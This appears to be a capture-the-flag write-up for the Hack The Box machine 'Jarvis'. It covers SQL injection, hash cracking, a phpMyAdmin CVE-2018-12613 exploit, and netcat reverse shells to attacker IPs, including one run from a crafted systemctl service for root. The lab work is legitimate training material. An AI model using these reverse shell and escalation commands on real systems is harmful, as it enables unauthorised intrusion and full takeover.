Skip to content

Latest commit

 

History

History
192 lines (102 loc) · 3.19 KB

README.md

File metadata and controls

192 lines (102 loc) · 3.19 KB
Raw

Jarvis

Let's identify open ports

nmap -p- --min-rate 10000 10.10.10.143

Alt text

Let's do nmap greater search for open ports.

nmap -sC -sV -p22,80,64999 10.10.10.143 -Pn

Alt text

Directory brute-forcing.

gobuster dir -u http://10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -t 40

Alt text

Here, I find 'room.php' and 'cod' parameter of this is vulnerable to SQLI,

Alt text

I did manul SQLI and found that it is vulnerable to SQLI that I did UNION-based SQLI.

Alt text

I searched on the internet that how can I get password of phpliteadmin, and found that from 'mysql.user' table and grab password.

Alt text

I grab MD5 hash of password of 'DBadmin' user and crack it by online Crackstation

Alt text

DBadmin: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0: imissyou

After entering above credentials, I am on the dashboard of phpliteadmin.

Alt text

I see that version of phpmyadmin (4.8.0)

Alt text

Let's search an exploit for this version.

Alt text

I found CVE-2018-12613 exploit for this version.

I download exploit to my machine and run it.

Alt text

I run the script against to my target and IT WORKED.

Alt text

Let's add reverse shell into here

nc -e /bin/sh 10.10.14.8 443

Alt text

Alt text

I spawned interactive shell.

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo;fg

export TERM=xterm
export SHELL=bash

I check the privileges of 'www-data' user.

Alt text

Then , I enumerate script itself, I see that there is 'Command Injection' possible as because.

os.system('ping ' + command)

Now, I add my reverse shell bash script into 'tmp' folder.

echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.4 7654' > /tmp/dr4ks.sh

And give execution privilege to this file.

chmod +x /tmp/dr4ks.sh

Alt text

Now, I run this script with 'sudo' privilege.

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Then, I enter my script execution as command injection. $(/tmp/dr4ks.sh)

Alt text

Now, I am pepper user.

Alt text

user.txt

Alt text

Let's search SUID files for privilege escalation.

find / -type f -perm /4000 2>/dev/null

Alt text

I found these and choose '/bin/systemctl' for privilege escalation. GTFOBINS

# FIRST
cat >dr4ks.service<<EOF
[Service]
Type=notify
ExecStart=/bin/bash -c 'nc -e /bin/bash 10.10.16.4 2003'
KillMode=process
Restart=on-failure
RestartSec=42s

[Install]
WantedBy=multi-user.target
EOF

# SECOND

systemctl link /home/pepper/dr4ks.service

# THIRD
systemctl start dr4ks

Alt text

root.txt

Alt text